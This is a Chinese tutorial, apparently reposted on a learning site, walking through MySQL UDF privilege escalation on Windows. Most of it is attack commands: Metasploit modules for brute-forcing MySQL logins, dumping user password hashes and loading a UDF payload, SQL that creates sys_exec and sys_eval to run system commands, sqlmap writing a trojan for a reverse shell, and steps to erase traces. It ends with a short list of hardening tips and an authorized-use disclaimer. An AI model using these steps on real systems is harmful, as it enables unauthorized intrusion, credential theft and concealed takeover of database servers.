文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Window环境下MySQL UDF提权

2023-03-21 16:29

关注

前言

本文章仅记录某次内网渗透过程中遇到的mysql 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!

一、UDF简介

UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。

攻击者通过编写调用cmd或shell的udf.dll/udf.so文件,并且导入到指定的文件夹目录下,创建一个指向udf.dll/udf.so的自定义函数,从而在数据库中的查询就等价于在cmd或shell中执行命令。

二、UDF提权条件

1、MySQL数据库的Root权限(可以通过账号密码远程登录到Mysql数据库)

2、MySQL具有写入文件的权限(即Secure_file_priv的值为空,不为空时必须有写入my.ini的权限)

连接MySQL数据库后,通过SQL语句show global variables like '%secure%';查看secure_file_priv的值。

当secure_file_priv的值为NULL,表示限制mysqld不允许导入|导出,此时无法提权。
当secure_file_priv的值为/tmp/, 表示限制mysqld的导入|导出只能发生在/tmp/目录下,此时也无法提权;
当secure_file_priv的值没有具体值时,表示不对mysqld的导入|导出做限制,此时可提权。

如果secure_file_priv的值不是空,需要在MySQL/my.ini中设置secure_file_priv参数为secure_file_priv =

三、上传动态链接库文件

动态链接库就是实现共享函数库概念的一种方式,在Windows环境下后缀名为 .dll ,在linux环境下后缀名为 .so ,我们要将该文件放在特定的目录中,该文件中包含了执行系统命令的一些函数。

MySQL版本大于5.1 ,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下(plugin文件夹默认不存在,需要自行创建;MySQL安装目录可以通过select basedir() 或者select @@basedir 查看)

MySQL版本小于5.1 ,udf.dll文件在win2003下放置于C:\Windows或者C:\Windows\system32目录,在win2000下放置在C:\Winnt\system32目录。

四、UDF提权步骤

1、查看secure_file_priv的值

Secure_file_priv是用来限制load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限。

输入语句:show global variables like '%secure%'; ##值为空即可操作

Window环境下MySQL UDF提权

2、查看plugin的值

select Host,user,plugin from mysql.user where user = substring_index(user(),'@',1);

当 plugin 的值为空时不可提权
当 plugin 值为 mysql_native_password 时可通过账户连接提权

Window环境下MySQL UDF提权

实际测试发现UDF提权成功与否与该值无关。

3、查看系统构架以及plugin目录

Show variables like '%compile%';  //查看主机版本及架构

Window环境下MySQL UDF提权

show variables like '%plugin%'; //查看 plugin 目录

Window环境下MySQL UDF提权

MSF漏洞验证

使用MSF搜索关于MySQL辅助利用脚本

search mysql

Window环境下MySQL UDF提权

Window环境下MySQL UDF提权

使用弱口令扫描脚本,并查看需要配置选项

use auxiliary/scanner/mysql/mysql_login
show options

Window环境下MySQL UDF提权

可配置 pass_file(暴力破解字典,所在绝对路径)在不知道密码的情况下可使用
配置 RHOSTS (靶机IP地址)
set rhosts 192.168.x.x/24 (可批量扫描)

Window环境下MySQL UDF提权

配置USERNAME(靶机MySQL服务用户名)或者配置USER_FILE(用户名字典)

方法二选一

set pass_file /top100.txt
set rhosts 192.168.x.x
set username root
run 或者 exploit 进行攻击!!!

以上两种方法是在未知MySQL数据库账密情况下进行爆破方式,具体以实际情况为主。

获取MySQL的基础信息

使用模块:use auxiliary/admin/mysql/mysql_enum

Window环境下MySQL UDF提权

set rhosts 192.168.x.x
set password root
set username root
run

获取MySQL基础信息及其他存在用户及其密码

Window环境下MySQL UDF提权

可使用CMD5或者john工具进行破解

Window环境下MySQL UDF提权

接下来进行UDF提权,加载攻击载荷

use exploit/multi/mysql/mysql_udf_payload
set rhosts 192.168.*.*
set password root

Window环境下MySQL UDF提权

Window环境下MySQL UDF提权

在MySQL中执行SQL语句,查看上传的DLL文件名

select * from mysql.func;

Window环境下MySQL UDF提权

执行命令 select sys_exec("whoami");

Window环境下MySQL UDF提权

如果返回结果为 0 就代表成功,返回1代表失败。

通过之前MSF生成的DLL文件创建sys_eval()函数,使执行的命令存在回显。

create function sys_eval returns string soname "****.dll";

Window环境下MySQL UDF提权

再次执行命令 select sys_eval("whoami");

Window环境下MySQL UDF提权

可使用攻击载荷 use auxiliary/admin/mysql/mysql_sql 进行后续其他命令操作

Window环境下MySQL UDF提权

五、UDF提权反弹Shell

当UDF提权后,我们想反弹一个MSF或者CS的shell,首先呢使用CS的PowerShell反弹命令是不行的,这里由于powershell命令引号过多,不能执行。

那么现在的思路就是执行木马文件,反弹Shell,这里由于sys_eval函数不能执行Windows那些远程下载命令,所以我们选择通过sqlmap的写入文件功能,将木马写入当前目录。

首先,查看当前目录

Window环境下MySQL UDF提权

然后sqlmap写入木马,这里也是可以进行远程下载的;

命令:sqlmap -u "http://192.168.x.x?id=1" --file-write msf.exe --file-est "C:\phpStudy\PHPTutorial\MySQL\data\*.exe"

执行木马反弹,这里需要注意的是,sys_eval函数只能执行当前目录下的文件,所以,也只能把文件写入当前路径下。

六、清理痕迹

命令:drop function sys_eval; drop function sys_exec;

Window环境下MySQL UDF提权

七、修复建议

1、mysql配置文件中 secure_file_priv 项设置为NULL或非 mysql/lib/plugin目录。

2、控制目录访问权限,例如控制/lib/pluginsystem32/wbem/mof等目录需要管理员权限访问或者设置为只读权限。

3、数据库用户确保正确实施最小权限原则

到此这篇关于Window环境下MySQL UDF提权的文章就介绍到这了,更多相关MySQL UDF提权内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     807人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     351人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     314人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     433人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     221人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-数据库
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯